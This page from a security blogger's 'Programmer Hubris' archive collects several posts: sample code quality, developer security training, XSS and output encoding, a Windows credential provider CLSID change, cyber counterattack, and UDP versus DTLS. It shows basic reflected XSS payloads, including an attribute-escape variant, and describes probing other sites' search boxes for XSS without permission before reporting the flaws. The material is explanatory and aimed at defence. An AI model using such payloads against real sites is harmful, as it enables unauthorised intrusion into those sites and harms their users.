Programmer Hubris – Page 3 – Tales from the Crypto

Programmer Hubris

There is no such thing as “small sample code”

Every few months, something encourages me to make the tweet that:

There is no such thing as “small sample code”, every sample you publish is an SDK of its own

OK, so the choice of calling these “SDKs” is rooted in my Microsoft dev background, where “sample code” didn’t need documentation or bug tracking, whereas an SDK does. You can adjust the terminology to suit.

The basic point here is to remind you that you do not get to abrogate all responsibility by saying “this is sample code, you will need to add error checking and security”, even if you do say it in the article – even if you say it in the comments of the sample!

Why do I care so much? It’s only three lines of code!

Simply stated, I’ve seen too many cases where people have included three lines of code (or five, or twenty, the count doesn’t matter) into a program, and they’ve stepped away and shipped that code.

“It wasn’t my fault,” they say, when the incident happens, “I copied that code from a sample online.”

This is the point at which the re-education machine is engaged – because, of course, it totally is your fault, if you include code in your development without treating it with the same rigour as if you had written every line of it yourself. You will get punished – usually by having to stay late and fix it.

It’s also the sample writer’s fault.

He gave you the mini-SDK that you imported blindly into your application, without testing it, without checking errors in it, without appropriate security measures, and he brushed you off with “well, of course, you should add your own error checks and security magic to it”.

Here’s an example of what I’m talking about, courtesy of Troy Hunt linking to an ASP forum.

No, if you’re providing sample code on the Internet, it’s important to make sure it doesn’t embody BAD design; this is code that will be taken up by people by definition less keen, less eager, less smart and less motivated to do things right than you are – after all, rather than figuring out how to write this code for themselves, they are allowing you to do it for them, to teach them how it’s done. If you then teach them how it’s done badly, that’s how they will learn to do it – badly. And they will teach others.

So, instead, make your three line samples five lines, and add enough error checking that unexpected issues or other bad things will break the sample’s execution.

Oh yeah, and what about updates, when you find a horrendous bug – how do you distribute those?

Why don’t we do that?

Reading a story on the consequences of the theft of Adobe’s source code by hackers, I come across this startling phrase:

The hackers seem to be targeting vulnerabilities they find within the stolen code. The prediction is that they’re sifting through the code, attempting to find widespread weaknesses, intending to exploit them with maximum effect by using zero-day attacks.

What I’d love to know is why we aren’t seeing a flood of developers crying out to be educated in how they, too, can learn to sift through their own code, attempt to find widespread weaknesses, so they can shore them up and prevent their code from being exploited.

An example of the sort of comments we are seeing can be found here, and they are fairly predictable – “does this mean Open Source is flawed, if having access to the source code is a security risk”, schadenfreude at Adobe’s misfortune, all manner of assertions that Adobe weren’t a very secure company anyway, etc.

Something that’s missing is an acknowledgement that we are all subject to the same pool of developers.

And attackers.

So, if you’re in the business of developing software – whether to sell, licence, give away, or simply to use in your own endeavours, you’re essentially in the same boat as Adobe prior to the hackers breaching their defences. Possibly the same boat as Adobe after the breach, but prior to the discovery.

Unless you are doing something different to what Adobe did, you are setting yourself up to be the next Adobe.

Obviously, Adobe isn’t giving us entire details of their own security program, and what’s gone right or wrong with it, but previous stories (as early as mid-2009) indicated that they were working closely with Microsoft to create an SDL (Security Development Lifecycle) for Adobe’s development.

So, instead of being all kinds of smug that Adobe got hacked, and you didn’t, maybe you should spend your time wondering if you can improve your processes to even reach the level Adobe was at when they got hacked.

And, to bring the topic back to what started the discussion – are you even doing to your software what these unidentified attackers are doing to Adobe’s code?

Are you poring over your own source code to find flaws?

How long are you spending to do that, and what tools are you using to do so?

Training developers to write secure code

I’ve done an amount of training developers recently, and it seems like there are a number of different kinds of responses to my security message.

[You can safely assume that there’s also something that’s wrong with the message and the messenger, but I want to learn about the thing I likely can’t control or change – the supply of developers]

Here are some unfairly broad descriptions of stereotypes I’ve encountered along the way. The truth, as ever, is more nuanced, but I think if I can reach each of these target personas, I should have just about everyone covered.

Is there anyone I’ve missed?

The previous victim

I’m always happy to have one or more of these people in the room – the sort of developer who has some experience, and has been on a project that was attacked successfully at some point or another.

This kind of developer has likely quickly learned the lesson that even his own code is subject to attack, vulnerable and weak to the persistent probes of attackers. Perhaps his experience has also included examples of his own failures in more ordinary ways – mere bugs, with no particular security implications.

Usually, this will be an older developer, because experience is required – and his tales of terror, unrehearsed and true, can sometimes provide the “scared straight” lesson I try to deliver to my students.

The previous attacker

This guy is usually a smart, younger individual. He may have had some previous nefarious activity, or simply researched security issues by attacking systems he owns.

But for my purposes, this guy can be too clever, because he distracts from my talk of ‘least privilege’ and ‘defence in depth’ with questions about race conditions, side-channel attacks, sub-millisecond time deltas across multi-second latency routes, and the like. IF those were the worst problems we see in this industry, I’d focus on them – but sadly, sites are still vulnerable to simple attacks, like my favourite – Reflected XSS in the Search field. [Simple exercise – watch a commercial break, and see how many of the sites advertised there have this vulnerability in them.]

But I like this guy for other reasons – he’s a possible future hire for my team, and a probable future assistant in finding, reporting and addressing vulnerabilities. Keeping this guy interested and engaged is key to making sure that he tells me about his findings, rather than sharing them with friends on the outside, or exploiting them himself.

“I did a security class at college”

Unbelievably to me, there are people who “done a project on it”, and therefore know all they want to about security. If what I was about to tell them was important, they’d have been told it by their professor at college, because their professor knew everything of any importance.

I personally wonder if this is going to be the kind of SDE who will join us for a short while, and not progress – because the impression they give to me is that they’ve finished learning right before their last final exam.

Salaryman

Related to the previous category is the developer who only does what it takes to get paid and to receive a good performance review.

I think this is the developer I should work the hardest to try and reach, because this attitude lies at the heart of every developer on their worst days at their desk. When the passion wanes, or the task is uninteresting, the desire to keep your job, continue to get paid, and progress through your career while satisfying your boss is the grinding cog that keeps you moving forward like a wind-up toy.

This is why it is important to keep searching to find ways of measuring code quality, and rewarding people who exhibit it – larger rewards for consistent prolonged improvement, smaller but more frequent rewards to keep the attention of the developer who makes a quick improvement to even a small piece of code.

Sadly, this guy is in my class because his boss told him he ought to attend. So I tell him at the end of my class that he needs to report back to his boss the security lesson that he learned – that all of his development-related goals should have the adverb “securely” appended to them. So “develop feature X” becomes “develop feature X securely”. If that is the one change I can make to this developer’s goals, I believe it will make a difference.

Fanboy

I’ve been doing this for long enough that I see the same faces in the crowd over and over again. I know I used to be a fanboy myself, and so I’m aware that sometimes this is because these folks learn something new each time. That’s why I like to deliver a different talk each time, even if it’s on the same subject as a previous lesson.

Or maybe they just didn’t get it all last time, and need to hear it again to get a deeper understanding. Either way, repeat visitors are definitely welcome – but I won’t get anywhere if that’s all I get in my audience.

Vocational

Some developers do the development thing because they can’t NOT write code. If they were independently wealthy and could do whatever they want, they’d be behind a screen coding up some fun little app.

I like the ones with a calling to this job, because I believe I can give them enough passion in security to make it a part of their calling as well. [Yes, I feel I have a calling to do security – I want to save the world from bad code, and would do it if I was independently wealthy.]

Stereotypical / The Surgeon

Sadly, the hardest person to reach – harder even than the Salaryman – is the developer who matches the stereotypical perception of the developer mindset.

Convinced of his own superiority and cleverness, even if he doesn’t express it directly in such conceited terms, this person will see every suggested approach as beneath him, and every example of poor code as yet more proof of his own superiority.

“Sure, you’ve had problems with other developers making stupid security mistakes,” he’ll think to himself, “But I’m not that dumb. I’ve never written code that bad.”

I certainly hope you won’t ever write code as bad as the examples I give in my classes – those are errant samples of code written in haste, and which I wouldn’t include in my class if they didn’t clearly illustrate my point. But my point is that your colleagues – everyone around you – are going to write this bad a piece of code one day, and it is your job to find it. It is also their job to find it in the code you write, so either you had better be truly as good as you think you are, or you had better apply good security practices so they don’t find you at your worst coding moment.

Playing with security blogs

I’ve found a new weekend hobby – it takes only a few minutes, is easily interruptible, and reminds me that the state of web security is such that I will never be out of a job.

I open my favourite search engine (I’m partial to Bing, partly because I get points, but mostly because I’ve met the guys who built it), search for “security blog”, and then pick one at random.

Once I’m at the security blog site – often one I’ve never heard of, despite it being high up in the search results – I find the search box and throw a simple reflected XSS attack at it.

If that doesn’t work, I view the source code for the results page I got back, and use the information I see there to figure out what reflected XSS attack will work. Then I try that.

[Note: I use reflected XSS, because I know I can only hurt myself. I don’t play stored XSS or SQL injection games, which can easily cause actual damage at the server end, unless I have permission and I’m being paid.]

Finally, I try to find who I should contact about the exploitability of the site.

It’s interesting just how many of these sites are exploitable – some of them falling to the simplest of XSS attacks – and even more interesting to see how many sites don’t have a good, responsive contact address (or prefer simply not to engage with vuln discoverers).

So, what do you find?

I clearly wouldn’t dream of disclosing any of the vulnerabilities I’ve found until well after they’re fixed. Of course, after they’re fixed, I’m happy to see a mention that I’ve helped move the world forward a notch on some security scale. [Not sure why I’m not called out on the other version of that changelog.] I might allude to them on my twitter account, but not in any great detail.

From clicking the link to exploit is either under ten minutes or not at all – and reporting generally takes another ten minutes or so, most of which is hunting for the right address. The longer portion of the game is helping some of these guys figure out what action needs to be taken to fix things.

Try using a WAF – NOT!

You can try using a WAF to solve your XSS problem, but then you’ve got two problems – a vulnerable web site, and that you have to manage your WAF settings. If you have a lot of spare time, you can use a WAF to shore up known-vulnerable fields and trap known attack strings. But it really doesn’t ever fix the problem.

Don’t echo my search query

If you can, don’t echo back to me what I sent you, because that’s how these attacks usually start. Don’t even include it in comments, because a good attack will just terminate the comment and start injecting HTML or script.

Remove my strange characters

Unless you’re running a source code site, you probably don’t need me to search for angle brackets, or a number of other characters. So take them out of my search – or plain reject my search if I include them in my search.

Encode everything

OK, so you don’t have to encode the basics – what are the basics? I tend to start with alphabetic and numeric characters, maybe also a space. Encode everything else.

Which encoding?

Yeah, that’s always the hard part. Encode it using the right encoding. That’s the short version. The long version is that you figure out what’s going to decode it, and make sure you encode for every layer that will decode. If you’re putting my text into a web page as a part of the page’s content, HTML encode it. If it’s in an attribute string, quote the characters using HTML attribute encoding – and make sure you quote the entire attribute value! If it’s an attribute string that will be used as a URL, you should URL encode it. Then you can HTML encode it, just to be sure.

[Then, of course, check that your encoding hasn’t killed the basic function of the search box!]

Respond to security reports

You should definitely respond to security reports – I understand that not everyone can have a 24/7 response team watching their blog (I certainly don’t) – you should try to respond within a couple of days, and anything under a week is probably going to be alright. Some vuln discoverers are upset if they don’t get a response much sooner, and see that as cause to publish their findings.

Me, I send a message first to ask if I’ve found the right place to send a security vulnerability report to, and only when I receive a positive acknowledgement do I send on the actual details of the exploit.

Be like Billy – Mind your XSS Manners!

I’ve said before that I wish programmers would respond to reports of XSS as if I’d told them I caught them writing a bubble sort implementation in Cobol. Full of embarrassment at being such a beginner.

Credential Provider update–Windows 8 SDK breaks a few things…

You’ll recall that back in February of 2011, I wrote an article on implementing your first Credential Provider for Windows 7 / 8 / Server 2008 R2 / Server 2012 – and it’s been a fairly successful post on my blog.

Just recently, I received a report from one of my users that my version of this was no longer wrapping the password provider on Windows Server 2008 R2.

As you’ll remember from that earlier article, it’s a little difficult (but far from impossible) to debug your virtual machine to get information out of the credential provider while it runs.

Just not getting called

Nothing seemed to be obviously wrong, the setup was still executing the same way, but the code just wasn’t getting called. For the longest time I couldn’t figure it out.

Finally, I took a look at the registry entries.

My code was installing itself to wrap the password provider with CLSID “{60b78e88-ead8-445c-9cfd-0b87f74ea6cd}”, but the password provider in Windows Server 2008 R2 appeared to have CLSID “{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}”. Subtle, to be sure, but obviously different.

I couldn’t figure out immediately why this was happening, but I eventually traced back through the header files where CLSID_PasswordCredentialProvider was defined, and found the following:

   1: EXTERN_C const CLSID CLSID_PasswordCredentialProvider;

   2:  

   3: #ifdef __cplusplus

   4:  

   5: class DECLSPEC_UUID("60b78e88-ead8-445c-9cfd-0b87f74ea6cd") 

   6: PasswordCredentialProvider; 

   7: #endif

   8:  

   9: EXTERN_C const CLSID CLSID_V1PasswordCredentialProvider;

  10:  

  11: #ifdef __cplusplus

  12:  

  13: class DECLSPEC_UUID("6f45dc1e-5384-457a-bc13-2cd81b0d28ed") 

  14: V1PasswordCredentialProvider; 

  15: #endif 

  16:  

As you can see, in addition to CLSID_PasswordCredentialProvider, there’s a new entry, CLSID_V1PasswordCredentialProvider, and it’s this that points to the class ID that Windows Server 2008 R2 uses for its password credential provider – and which I should have been wrapping with my code.

The explanation is obvious

It’s clear what happened here with a little research. For goodness-only-knows-what-unannounced-reason, Microsoft chose to change the class ID of the password credential provider in Windows 8 and Windows Server 2012. And, to make sure that old code would continue to work in Windows 8 with just a recompile, of course they made sure that the OLD name “CLSID_PasswordCredentialProvider” would point to the NEW class ID value. And, as a sop to those of us supporting old platforms, they gave us a NEW name “CLSID_V1PasswordCredentialProvider” to point to the OLD class ID value.

And then they told nobody, and included it in Visual Studio 2012 and the Windows 8 SDK.

In fact, if you go searching for CLSID_V1PasswordCredentialProvider, you’ll find there’s zero documentation on the web at all. That’s pretty much unacceptable behaviour, introducing a significantly breaking change like this without documentation.

So, how to support both values?

Supporting both values requires you to try and load each class in turn, and save details indicating which one you’ve loaded. I went for this rather simple code in SetUsageScenario:

   1: IUnknown *pUnknown = NULL;

   2: _pWrappedCLSID = CLSID_PasswordCredentialProvider;

   3: hr = ::CoCreateInstance(CLSID_PasswordCredentialProvider, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pUnknown));

   4: if (hr == REGDB_E_CLASSNOTREG)

   5: {

   6:     _pWrappedCLSID = CLSID_V1PasswordCredentialProvider;

   7:     hr = ::CoCreateInstance(CLSID_V1PasswordCredentialProvider, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pUnknown));

   8: }

Pretty bone-dead simple, I hope you’ll agree – the best code often is.

Of course, if you’re filtering on credential providers, and hope to hide the password provider, you’ll want to filter both providers there, too. Again, here’s my simple code for that in Filter:

   1: if (IsEqualGUID(rgclsidProviders[i], CLSID_PasswordCredentialProvider))

   2:     rgbAllow[i]=FALSE;

   3: if (IsEqualGUID(rgclsidProviders[i], CLSID_V1PasswordCredentialProvider))

   4:     rgbAllow[i]=FALSE;

If that wasn’t nasty enough…

Ironically, impacting the Windows XP version of the same package (which uses a WinLogon Notification Provider, instead of a Credential Provider), another thing that the Windows 8 SDK and Visual Studio 2012 did for me is that it disabled the execution of my code on Windows XP.

This time, they did actually say something about it, though, which allowed me to trace and fix the problem just a little bit more quickly.

The actual blog post (not official documentation, just a blog post) that describes this change is here:

Windows XP Targeting with C++ in Visual Studio 2012

What this blog indicates is that a deliberate step was taken to disable Windows XP support in executables generated by Visual Studio 2012. You have to go back and make changes to your projects in order to continue supporting Windows XP.

That’s not perhaps so bad, because really, Windows XP is pretty darn old. In fact, in a year from now it’ll be leaving its support lifecycle, and heading into “Extended Support”, where you have to pay several thousand dollars for every patch you want to download. I’d upgrade to Windows 7 now, if I were you.

That old “cyber offence” canard again

I’m putting this post in the “Programmer Hubris” section, but it’s really not the programmers this time, it’s the managers. And the lawyers, apparently.

Something set me off again

Well, yeah, it always does, and this time what set me off is an NPR article by Tom Gjelten in a series they’re currently doing on “cybersecurity”.

This article probably had a bunch of men talking to NPR with expressions such as “hell, yeah!” and “it’s about time!”, or even the more balanced “well, the best defence is a good offence”.

Absolute rubbish. Pure codswallop.

But aren’t we being attacked? Shouldn’t we attack back?

Kind of, and no.

We’re certainly not being “attacked” in the means being described by analogy in the article.

"If you’re just standing up taking blows, the adversary will ultimately hit you hard enough that you fall to the ground and lose the match. You need to hit back." [says Dmitri Alperovitch, CrowdStrike’s co-founder.]

Yeah, except we’re not taking blows, and this isn’t boxing, and they’re not hitting us hard.

"What we need to do is get rid of the attackers and take away their tools and learn where their hideouts are and flush them out," [says Greg Hoglund, co-founder of HBGary, another firm known for being hacked by a bunch of anonymous nerds that he bragged about being all over]

That’s far closer to reality, but the people whose job it is to do that is the duly appointed law enforcement operatives who are able to enforce law.

"It’s [like] the government sees a missile heading for your company’s headquarters, and the government just yells, ‘Incoming!’ " Alperovitch says. "It’s doing nothing to prevent it, nothing to stop it [and] nothing to retaliate against the adversary." [says Alperovitch again]

No, it’s not really like that at all.

There is no missile. There is no boxer. There’s a guy sending you postcards.

What? Excuse me? Postcards?

Yep, pretty much exactly that.

Every packet that comes at you from the Internet is much like a postcard. It’s got a from address (of sorts) and a to address, and all the information inside the packet is readable. [That’s why encryption is applied to all your important transactions]

So how am I under attack?

There’s a number of ways. You might be receiving far more postcards than you can legitimately handle, making it really difficult to assess which are the good postcards, and which are the bad ones. So, you contact the postman, and let him know this, and he tracks down (with the aid of the postal inspectors) who’s sending them, and stops carrying those postcards to you. In the meantime, you learn how to spot the obvious crappy postcards and throw them away – and when you use a machine to do this, it’s a lot less of a problem. That’s a denial of service attack.

Then there’s an attack against your web site. Pretty much, that equates to the postcard sender learning that there’s someone reading the postcards, whose job it is to do pretty much what the postcards tell them to do. So he sends postcards that say “punch the nearest person to you really hard in the face”. Obviously a few successes of this sort lead you to firing the idiot who’s punching his co-workers, and instead training the next guy as to what jobs he’s supposed to do on behalf of the postcard senders.

I’m sure that my smart readers can think up their own postcard-based analogies of other attacks that go on, now that you’ve seen these two examples.

Well if it’s just postcards, why don’t I send some of my own?

Sure, send postcards, but unless you want the postman to be discarding all your outgoing mail, or the law enforcement types to turn up at your doorstep, those postcards had better not be harassing or inappropriate.

Even if you think you’re limiting your behaviour to that which the postman won’t notice as abusive, there’s the other issue with postcards. There’s no guarantee that they were sent from the address stated, and even if they were sent from there, there is no reason to believe that they were official communications.

All it takes is for some hacker to launch an attack from a hospital’s network space, and you’re now responsible for attacking an innocent target where lives could actually be at risk. [Sure, if that were the case, the hospital has shocking security issues of its own, but can you live with that rationalisation if your response to someone attacking your site winds up killing someone?]

I don’t think that counterattack on the Internet is ethical or appropriate.

That “are you kidding me?” moment in customer support

So, my Sunbeam electric blanket died yesterday. Second one in a year.

As a dutiful consumer, I’d really like to report this to the manufacturer, get a replacement and move on. I fill out the “Contact Us” form. Then I get this ludicrous error:

image

So, you’re going to ask your customers to contact you when they have problems, and then you’re going to actually limit the characters they’re allowed to use in the QUESTION that they’re asking you?

Asking me to avoid using quotes, colons and semicolons in written English is completely ludicrous.

And yes, I know why they do this. It’s because they attended a course on secure programming which told them how to do input validation.

Input validation is not the shizzle

I am constantly amazed as to how frequently I have to ram this point home to developers who have learned one trick to protect against injection attacks.

“Validate ALL input – reject the bad characters!” – I’ve heard this from a number of people, including security professionals.

When you CAN do strict input validation based off a restricted whitelist, of course, that’s great – “input a whole number between one and ten” is good for input validation. “Input your name” generally isn’t, because names have a habit of containing characters that are known to be ‘bad’ characters in a number of cases, such as “O’Donnell”. Apostrophes are bad in numerous cases. “Input your question”, as in this case, is likely to elicit all kinds of funky characters.

And, as I ask the candidates on my phone screen interviews, what do you do in the case when you have a web app which stores to a SQL database, and its task is to store XSS and SQL injection attacks. <sigh> Clearly, you have to use acceptable output encoding. Apparently, Sunbeam’s web developers are not good enough to know when to stop using input validation, and start using output encoding.

Even less smart

My suspicions are confirmed when, after typing in a correctly formed question, the model number of the blanket (which, curiously, isn’t anywhere on the blanket or its controllers), the date code on the plug, and my contact details, the web page unerringly provides me with this as its response:

image

So, I think our next step is to contact Amazon to resolve this customer service issue properly. And not buying from Sunbeam again.

On new exploit techniques

Last year’s discussion on “Scriptless XSS” made me realise that there are two kinds of presentation about new exploits – those that talk about a new way to trigger the exploit, and those that talk about a new way to take advantage of the exploit.

Since I didn’t actually see the “Scriptless XSS” presentation at Blue Hat (not having been invited, I think it would be bad manners to just turn up), I won’t address it directly, and it’s entirely possible that much of what I say is actually irrelevant to that particular paper. I’m really being dreadfully naughty here and setting up a strawman to knock down. In the tech industry, this practice is often referred to as “journalism”.

So where’s my distinction?

Let’s say you’re new to XSS. It’s possible many of you actually are new to XSS, and if you are, please read my previous articles about how it’s just another name for allowing an attacker to inject content (usually HTML) into a web page.

Your first XSS exploit example may be that you can put “<script>alert(1)</script>” into a search field, and it gets included without encoding into the body of the results page. This is quite frankly so easy I’ve taught my son to do it, and we’ve had fun finding sites that are vulnerable to this. Of course, we then inform them of the flaw, so that they get it fixed. XSS isn’t perhaps the most damaging of exploits – unlike SQL injection, you’re unlikely to use it to steal a company’s entire customer database – but it is an embarrassing indication that the basics of security hygiene are not being properly followed by at least some of your development team.

The trigger of the exploit here is the “<>” portion (not including the part replaced by ellipsis), and the exploit itself is the injection of script containing an alert(1) command.

Let’s say now that the first thing a programmer tries to protect his page is to replace the direct embedding of text with an <input> tag, whose value is set to the user-supplied text, in quotes.

Your original exploit is foiled, because it comes out as:

<input readonly=1 value="<script>alert(1)</script>">

That’s OK, though, because the attacker will see that, and note that all he has to do is provide the terminating quote and angle bracket at the start of his input, to produce instead:

<input readonly=1 value=""><script>alert(1)</script>">

This is a newer method of exploiting XSS-vulnerable code. Although a simple example, this is the sort of thing it’s worth getting excited about.

Why is that exciting?

It’s exciting because it causes a change in how you planned to fix the exploit. You had a fix that prevented the exploit from happening, and now it fails, so you have to rethink this. Any time you are forced to rethink your assumptions because of new external data, why, that’s SCIENCE!

And the other thing is…?

Well, the other thing is noting that if the developer did the stupid thing, and blocked the word “alert”, the attacker can get around that defence by using the “prompt” keyword instead, or by redirecting the web page to somewhere the attacker controls. This may be a new result, but it’s not a new trigger, it’s not a new cause.

When defending your code against attack, always ask yourself which is the trigger of an attack, rather than the body of the attack itself. Your task is to prevent the trigger, at which point the body becomes irrelevant.

Time to defend myself.

I’m sure that someone will comment on this article and say that I’m misrepresenting the field of attack blocking – after all, the XSS filters built into major browsers surely fall into the category of blocking the body, rather than the trigger, of an attack, right?

Sure, and that’s one reason why they’re not 100% effective. They’re a stopgap measure – a valuable stopgap measure, don’t get me wrong, but they are more in the sense of trying to recognise bad guys by the clothing they choose to wear, rather than recognising bad guys by the weapons they carry, or their actions in breaking locks and planting explosives. Anyone who’s found themselves, as I have, in the line of people “randomly selected for searching” at the airport, and looked around and noted certain physical similarities between everyone in the line, will be familiar with the idea that this is more an exercise in increasing irritation than in applying strong security.

It’s also informative to see methods by which attacks are carried out – as they grow in sophistication from fetching immediate cookie data to infecting browser sessions and page load semantics, it becomes easier and easier to tell developers “look at all these ways you will be exploited, and you will begin to see that we can’t depend on blocking the attack unless we understand and block the triggers”.

Keep doing what you’re doing

I’m not really looking to change any behaviours, nor am I foolish enough to think that people will start researching different things as a result of my ranting here.

But, just as I’ve chosen to pay attention to conferences and presentations that tell me how to avoid, prevent and fix, over those that only tell me how to break, I’ll also choose to pay attention to papers that show me an expansion of the science of attacks, their detection and prevention, over those that engage in a more operational view of “so you have an inlet, what do you do with it?”

XSS Hipster loved Scriptless XSS before it was cool

I was surprised last night and throughout today, to see that a topic of major excitement at the Microsoft BlueHat Security Conference was that of “Scriptless XSS”.

The paper presented on the topic certainly repeats the word “novel” a few times, but I will note that if you do a Google or Bing search for “Scriptless XSS”, the first result in each case is, of course, a simple blog post from yours truly, a little over two years ago, in July 2010.

As the article notes, this isn’t even the first time I’d used the idea that XSS (Cross Site Scripting) is a complete misnomer, and that “HTML injection” is a more appropriate description. JavaScript – the “Scripting” in most people’s explanations of Cross Site Scripting – is definitely not required, and is only used because it is an alarmingly clear demonstration that something inappropriate is happening.

Every interview in the security field – every one!

Every time I have had an interview in the security field – that’s since 2006 – I’ve been asked “Explain what Cross Site Scripting is”, and rather hesitantly at first, but with growing surety, I have answered that it is simply “HTML injection”, and the conversation goes wonderfully from there.

Why did I come up with this idea?

Fairly simply, I’ve found that if you throw standard XSS exploits at developers and tell them to fix the flaw, they do silly things like blocking the word “script”. As I’ve pointed out before, Cross Site Scripting (as with all injection attacks) requires an Injection (how the attacker provides their data), an Escape (how the attacker’s data moves from data into code), an Attack or Execution (the payload), and optionally a Cleanup (returning the user’s browser state to normal so they don’t notice the attack happening).

It’s not the script, stupid, it’s the escape.

Attacks are wide and varied – the paper on Scriptless Attacks makes that clear, by presenting a number of novel (to me, at least) attacks using CSS (Cascading Style Sheet) syntax to exfiltrate data by measuring scrollbars. My example attack used nothing so outlandish – just the closure of one form, and the opening of another, with enough CSS attribute monkeying to make it look like the same form. The exfiltration of data in this case is by means of the rather pedestrian method of having the user type their password into a form field and submit it to a malicious site. No messing around with CSS to measure scrollbars and determine the size of fonts.

Hats off to these guys, though.

I will say this – the attacks they present are an interesting and entertaining demonstration that if you’re trying to block the Attack or Cleanup phases of an Injection Attack, you have already failed, you just don’t know it yet. Clearly a lot of work and new study went into these attacks, but it’s rather odd that their demonstrations are about the more complicated end of Scriptless XSS, rather than about the idea that defenders still aren’t aware of how best to defend.

Also, no doubt, they had the sense to submit a paper on this – all I did was blog about it, and provide a pedestrian example with no flashiness to it at all.

Hipster gets no respect.

So, yeah, I was talking about XSS without the S, long before it was cool to do so. As my son informs me, that makes me the XSS Hipster. It’d be gratifying to my ego to get a little nod for that (heck, I don’t even get an invite to BlueHat), but quite frankly rather than feeling all pissed off about that, I’m actually rather pleased that people are working to get the message out that JavaScript isn’t the problem, at least when it comes to XSS.

The problem is the Injection and the Escape – you can block the Injection by either not accepting data, or by having a tight whitelist of good values; and you can block the Escape by appropriately encoding all characters not definitively known to be safe.

UDP and DTLS not a performance improvement.

Saw this update in my Windows Update list recently:

http://support.microsoft.com/kb/2574819

As it stands right now, this is what it says (in part):

image

OK, so I started off feeling good about this – what’s not to like about the idea that DTLS, a security layer for UDP that works roughly akin to TLS / SSL for TCP, now can be made a part of Windows?

Sure, you could say “what about downstream versions”, but then again, there’s a point where a developer should say “upgrading has its privileges”. I don’t support Windows 3.1 any more, and I don’t feel bad about that.

No, the part I dislike is this one:

Note DTLS provides TLS functionalities that are based on the User Datagram Protocol (UDP) protocol. Because TLS is based on the Transmission Control Protocol (TCP) protocol, DTLS performs better than TLS.

Wow.

That’s just plain wrong. Actually, I’m not even sure it qualifies as wrong, and it’s quite frankly the sort of mis-statement and outright guff that made me start responding to networking posts in the first place, and which propelled me in the direction of eventually becoming an MVP.

Nerd

Yes, I was the nerdy guy complaining that there were already too many awful networking applications, and that promulgating stupid myths like “UDP performs better than TCP” or “the Nagle algorithm is slowing your app down, just disable it” causes there to be more of the same.

But I think that’s really the point – you actually do want nerds of that calibre writing your network applications, because network programming is not easy – it’s actually hard. As I have put it on a number of occasions, when you’re writing a program that works over a network, you’re only writing one half of the application (if that). The other half is written by someone else – and that person may have read a different RFC (or a different version of the protocol design), may have had a different interpretation of ambiguous (or even completely clear) sections, or could even be out to destroy your program, your data, your company, and anyone who ever trusted your application.

Surviving in those circumstances requires an understanding of the purity of good network code.

But surely UDP is faster?

Bicycle messengers are faster than the postal service, too. Fast isn’t always what you’re looking for. In the case comparing UDP and TCP, if it was just a matter of “UDP is faster than TCP”, all the world’s web sites would be running on some protocol other than HTTP, because HTTP is rooted in TCP. Why don’t they?

Because UDP repeats packets, loses packets, repeats packets, and first of all, re-orders packets. And when your web delivery over UDP protocol retransmits those lost packets, correctly orders packets, drops repeated packets, and thereby gives you the full web experience without glitches, it’s re-written large chunks of the TCP stack over UDP – and done so with worse performance.

Don’t get me wrong – UDP is useful in and of itself, just not for the same tasks TCP is useful for. UDP is great for streaming audio and video, because you’d rather drop frames or snippets of sound than wait for them to arrive later (as they would do with TCP requesting retransmission, say). If you can afford to lose a few packets here and there in the interest of timely delivery of those packets that do get through, your application protocol is ideally suited to UDP. If it’s more important to occasionally wait a little in order to get the whole stream, TCP will outperform UDP every time.

In summary…

Never choose UDP over TCP because you heard it goes faster.

Choose UDP over TCP because you’d rather have packets dropped at random by the network layer than have them arrive any later than the absolute fastest they can get there.

Choose TCP over UDP because you’d rather have all the packets that were sent, in the order that they were sent, than get most / many / some of them earlier.

And whether you use TCP or UDP, you can now add TLS-style security protection.

I await the arrival of encrypted UDP traffic with some interest.